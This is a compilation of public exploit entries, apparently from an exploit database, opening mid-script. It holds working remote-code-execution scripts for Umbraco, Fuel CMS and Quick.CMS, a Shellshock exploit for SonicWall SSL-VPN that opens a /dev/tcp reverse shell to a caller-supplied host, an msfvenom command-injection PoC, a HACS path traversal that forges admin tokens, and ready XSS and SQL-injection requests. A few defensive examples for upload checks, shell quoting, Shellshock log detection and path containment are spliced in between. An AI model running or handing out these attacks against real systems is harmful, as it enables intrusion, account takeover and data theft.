  end
rescue Docopt::Exit => e
  puts e.message
end
-
jQuery UI 1.12.1 - Denial of Service (DoS)
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>
    <div>
        <button onclick="exploit()">Exploit</button>
    </div>
    <p>PoC by Rafael Cintra Lopes</p>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>
-
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
                                 description='Umbraco authenticated RCE',
                                 formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='')

args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
s = requests.session()
r2 = s.post(url_login, json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
    "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT"
}

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)

# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)
-
Fuel CMS 1.4.1 - Remote Code Execution (2)
# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil

doc = <<~DOCOPT
  Fuel CMS 1.4 - Remote Code Execution

  Usage:
    #{__FILE__} <url> <cmd>
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <cmd>       The system command to execute
    -h, --help  Show this screen

  Examples:
    #{__FILE__} http://example.org id
    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT

def exploit(client, root_url, cmd)
  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
  res = client.get(url)
  /system(.+?)<div/mx.match(res.body).captures[0].chomp
end

begin
  args = Docopt.docopt(doc)
  clnt = HTTPClient.new
  puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
  puts e.message
end
-
BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 - 0.5.2.1
# Tested on: windows 10

Vulnerable page: /admin/include/inc_content_articles.php

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side.
2: Add a new post, put the payload "<img src=# onerror=alert('xss')>" in the "text" parameter and click on the save button. The post is saved successfully.
3: The XSS is now stored and triggers every time the post is viewed, so the attacker can steal authenticated users' cookies.
-
WordPress Plugin SuperForms 4.9 - Arbitrary File Upload
# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)

# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1    <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF    <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]"; filename="filename.(extension)"    <==== inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded
-----------------------------423513681827540048931513055996--

# The uploaded malicious file can be found at: /wp-content/uploads/superforms/2021/01/<id>/filename.php4
# The <id> is returned in the server's reply to the upload request.
# Root cause: the extension allowlist ("accept_file_types") is taken from the request body, so the client decides which extensions are "valid".
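Why the request above works, as an added example that is not the plugin's own code: the only thing standing between the attacker and a .php4 upload is an allowlist read from the request body. The two functions below are hypothetical re-creations of that pattern and of the server-side check that should replace it; the extension sets are constructed for the demo.

```python
import os
import re

# Constructed allowlists for the example. A real handler should derive the
# executable set from what the web server actually hands to PHP (AddHandler /
# FilesMatch rules), not from a fixed list.
SERVER_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def upload_allowed_vulnerable(filename, accept_file_types):
    """Shape of the bug in the advisory: the allowlist is whatever the client
    sent in the 'accept_file_types' multipart field, so appending '|PHP4'
    to it makes 'filename.php4' pass the check."""
    pattern = re.compile(r"\.(" + accept_file_types + r")$", re.IGNORECASE)
    return pattern.search(filename) is not None


def upload_allowed_fixed(filename, accept_file_types=None):
    """Hardened form: the request's allowlist is ignored entirely. Strip any
    path, require a non-empty base name with an extension, reject every
    extension the server could execute (this also catches 'shell.php.jpg'
    double extensions), and compare the final extension, lowercased, against
    the server-side list."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) < 2 or any(part == "" for part in parts):
        return False          # no extension, or a dotfile such as .htaccess
    exts = [part.lower() for part in parts[1:]]
    if any(ext in EXECUTABLE_EXTS for ext in exts):
        return False
    return exts[-1] in SERVER_ALLOWLIST


if __name__ == "__main__":
    injected = "jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF|PHP4"
    print(upload_allowed_vulnerable("filename.php4", injected))   # True: attacker wins
    print(upload_allowed_fixed("filename.php4", injected))        # False
```

The fix has to live server-side; there is no value in the request the handler can trust. As defence in depth the uploads directory should also be served with script execution disabled, so that a bypass of the extension check still does not yield code execution.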
-
Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
# The quote closes the literal msfvenom wraps the dname in, the pipe runs our
# decoder, and '#' comments out whatever follows on the command line.
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias,
                       "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA",
                       "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1",
                       "-keystore", keystore_file, "-storepass", storepass,
                       "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
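The bug class the PoC above triggers, as an added example that is neither Justin Steven's code nor msfvenom's: a value read from an attacker-supplied file (the signing certificate's -dname) is spliced into a command line that a shell parses. The keytool/jarsigner step is replaced here with printf so the demonstration is harmless, the injected command only prints a marker, and the function names and the EVIL_DNAME string are constructed for the demo.

```python
import subprocess

# Constructed payload in the same shape as the PoC's -dname: the quote closes
# the literal the caller opened, the pipe starts a new command, and '#' turns
# the caller's trailing quote into a comment so the shell does not choke.
EVIL_DNAME = "CN='|echo INJECTED #"


def run_with_shell_string(dname):
    """Vulnerable pattern: the untrusted value is interpolated into a command
    line handed to a shell (shell=True here; backticks or %x() in Ruby behave
    the same way). The single quotes look like protection but are not."""
    cmd = "printf 'dname=%%s\\n' '%s'" % dname
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def run_with_argv(dname):
    """Fixed pattern: the value travels as its own argv element. Even when a
    shell is genuinely needed, pass the data as a positional parameter ($1)
    so the shell never re-parses it; quotes and pipes stay plain characters."""
    result = subprocess.run(
        ["sh", "-c", 'printf "dname=%s\\n" "$1"', "sh", dname],
        capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print(run_with_shell_string(EVIL_DNAME), end="")   # INJECTED
    print(run_with_argv(EVIL_DNAME), end="")           # dname=CN='|echo INJECTED #
```

The same distinction applies to the PoC itself: it calls keytool and jarsigner with argument lists, so its own handling of the hostile dname is safe; only the consumer that later builds a shell string from the certificate is exposed.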
-
SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.sonicwall.com/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def banner():
    # (ASCII-art "visualdoor" logo omitted; only the text of the banner is kept)
    print """
    SonicWall SSL-VPN Appliance Remote Exploit
    Public Release (Jan 2021).
    Author: Darren Martyn.
    Credit goes to Phineas Fisher for this.
    Stay inside, do crimes.
    """

def handler(lp):
    # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def execute_command(target, command):
    # Shellshock: the CGI wrapper exports User-Agent as an environment variable,
    # which a vulnerable bash evaluates as a function definition plus trailing command.
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
    r = requests.get(url=url, headers=headers, verify=False)
    return r.text

def check_exploitable(target):
    print "(+) Testing %s for pwnability..." %(target)
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print "(*) We can continue, time to wreck this shit."
        return True
    else:
        return False

def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    if check_exploitable(target) == True:
        pass
    else:
        sys.exit("(-) Target not exploitable...")
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):
    banner()
    if len(args) != 4:
        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)
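The primitive the script relies on is worth being able to spot in traffic, so here is an added example (not part of the visualdoor exploit) that flags the Shellshock prefix in request headers and in access-log lines. The log lines are constructed for the demo. The pattern is the `() {` function-definition prefix that a vulnerable bash evaluates from any environment variable, which is exactly where a CGI server places request headers such as User-Agent.

```python
import re

# Pre-patch bash imported a function from any env var whose value starts with
# "() {". Allow leading whitespace and optional spacing so the check also
# catches common evasion spellings such as "() {:;};".
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Apache/nginx combined log format, enough to pull out client, path, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<remote>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def is_shellshock(value):
    """True if a single header value carries the function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_headers(headers):
    """Names of all request headers whose value a vulnerable bash would
    evaluate once the CGI layer exports them into the environment."""
    return [name for name, value in headers.items() if is_shellshock(value)]


def scan_log(lines):
    """Hits from combined-format log lines: one dict per line whose referer or
    user-agent carries the prefix. Lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "agent"):
            if is_shellshock(m.group(field)):
                hits.append({"remote": m.group("remote"), "path": m.group("path"),
                             "field": field, "payload": m.group(field)})
                break
    return hits


# Constructed sample lines (not real traffic); the first and third mirror the
# header the exploit above sends.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jan/2021:10:01:02 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 1432 "-" '
    '"() { :; }; echo ; /bin/bash -c \'cat /etc/passwd\'"',
    '10.0.0.6 - - [24/Jan/2021:10:01:05 +0000] "GET /cgi-bin/welcome HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/84.0"',
    '10.0.0.7 - - [24/Jan/2021:10:01:09 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 1432 "-" '
    '"() {:;}; /bin/bash -c \'nohup bash -i >& /dev/tcp/10.0.0.9/1337 0>&1 &\'"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Log-based detection only sees the headers the server logs (User-Agent and Referer in the combined format); a payload delivered in Cookie or a custom header needs inspection at the proxy or WAF instead. None of this substitutes for patching bash on the appliance.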
-
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: <= 6.7
# CVE : CVE-2020-35754

#!/usr/bin/python3
import requests
import sys
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''######     Quick.CMS authenticated RCE by mari0x00     #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

if len(sys.argv) != 6:
    print((colored("[~] Usage  : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
    print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ [email protected] pass123 192.168.101.101 4444","red")))
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]

#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}

#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
    "sEmail": username,
    "sPass": password,
    "bAcceptLicense": "1",
    "iAcceptLicense": "true"
}
login = s.post(url+"admin.php?p=login", login_data, headers=headers)
sleep(0.5)

#Exploit: the language editor writes the submitted string into a PHP file without
#escaping, so a closing quote followed by system() gets executed on the next include
print((colored("[+] Adding shell command","blue")))
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
shell = {
    "sOption": "save",
    "Back_end_only": payload
}
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
sleep(1)

#Triggering reverse shell (three times just in case)
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
-
Online Grading System 1.0 - 'uname' SQL Injection
# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Vulnerable parameter: uname

# Injected Request

POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1

uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=

# The application only responds after the 20-second SLEEP() completes, confirming time-based blind injection.
---------------------------------------------------------------------------------
-
Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/

# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
#         the key `hassTokens`

import requests
import jwt
import json
import argparse


class HA:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def retrieveFile(self, f):
        # The /hacsfiles/ static handler does not confine requests to its root,
        # so ../../ walks up to the Home Assistant config directory.
        url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
        with requests.Session() as s:
            r = requests.Request(method='GET', url=url)
            prep = r.prepare()
            # prepare() normalises the ../ segments away; put the raw URL back
            # so they reach the server untouched
            prep.url = url
            try:
                r = s.send(prep, verify=False)
            except requests.exceptions.ConnectionError:
                return
            if r.status_code == 400 or r.status_code == 404:
                return
            return r

    def craftToken(self):
        # .storage/auth holds every user plus the per-refresh-token JWT signing keys
        f = self.retrieveFile('.storage/auth').json()
        # Find owner
        for user in f['data']['users']:
            if user['is_owner']:
                self.owner = user['id']
                break
        else:
            print("No owner found. Using first account")
            self.owner = f['data']['users'][0]['id']

        for token in f['data']['refresh_tokens']:
            if self.owner == token['user_id']:
                # Sign an access token with the leaked key (PyJWT >= 2 returns str;
                # on PyJWT 1.x add .decode() so json.dumps below works)
                encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256")
                self.token = {'access_token': encoded_jwt,
                              'token_type': 'Bearer',
                              'refresh_token': token['token'],
                              'expires_in': 1800,
                              'hassUrl': f"http://{self.ip}:{self.port}",
                              'clientId': token['client_id']}
                return self.token


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
HACS < 1.10.0 to gain admin access to a Home Assistant instance.")
    parser.add_argument("host", type=str, help="IP of the HASS instance")
    parser.add_argument("port", type=int, help="port of the HASS instance")
    args = parser.parse_args()

    r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
        ip=args.host, port=args.port))
    if r.status_code != 404:
        print("HACS found! Testing vulnerability...", end='', flush=True)
        ha = HA(args.host, args.port)
        if ha.retrieveFile('configuration.yaml'):
            print(": VULNERABLE")
            token = ha.craftToken()
            if token:
                print(f"Use the following 'hassTokens': {json.dumps(token)}")
            else:
                print("Unable to craft token")
        else:
            print(": Not vulnerable")
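What the `/hacsfiles/../../` request exploits, and the check that stops it, as an added example that is not HACS or Home Assistant code. The static root and the file names are constructed for the demo; the pure-string posixpath functions are used so the example runs without touching a filesystem, with a note below on what changes for a real one.

```python
import posixpath
from urllib.parse import unquote

# Constructed static root for the demo (the real location of the files served
# under /hacsfiles/ is not taken from the advisory).
STATIC_ROOT = "/config/www/community"


def resolve_static_vulnerable(root, requested):
    """Shape of the bug: the request path is glued onto the root and the
    resulting '..' segments are resolved by the filesystem, never checked."""
    return posixpath.normpath(posixpath.join(root, requested))


def resolve_static_fixed(root, requested):
    """Decode once, normalise, then prove the result is still inside root.
    Returns the resolved path, or None when the request must be refused."""
    decoded = unquote(requested)
    if "\x00" in decoded:                       # NUL would truncate in C-level APIs
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    # Prefix test with the separator so "/config/www/community-x" cannot pass.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_static_vulnerable(STATIC_ROOT, "../../.storage/auth"))   # /config/.storage/auth
    print(resolve_static_fixed(STATIC_ROOT, "../../.storage/auth"))        # None
    print(resolve_static_fixed(STATIC_ROOT, "iconset.js"))                 # /config/www/community/iconset.js
```

On a real filesystem do the same containment test on `Path(root, decoded).resolve()` (and `Path.is_relative_to` on Python 3.9+) so that symlinks inside the static tree cannot point back out of it. The exploit's `prep.url = url` line is the attacker's side of the same normalisation question: client libraries collapse `..` by default, so a server must never assume they will.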
-
MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
# Date: 1/27/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2021-3337

1. Description:
This plugin hides thread content until the user replies to the thread. The information disclosure is that the hidden content can be viewed without replying.

2. Proof of Concept:
- Visit a post whose content is hidden
- Click the reply or quote button below it
The thread content is displayed inside the [quote] tags of the reply editor without the user ever having to post a reply.
-
Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# The payload is stored with the message and executes in every chat session that loads the room.

POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl

msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1
-
Simple Public Chat Room 1.0 - Authentication Bypass SQLi
# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /chat/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Referer: http://localhost/chat/index.php?attempt=
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
Upgrade-Insecure-Requests: 1

username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--
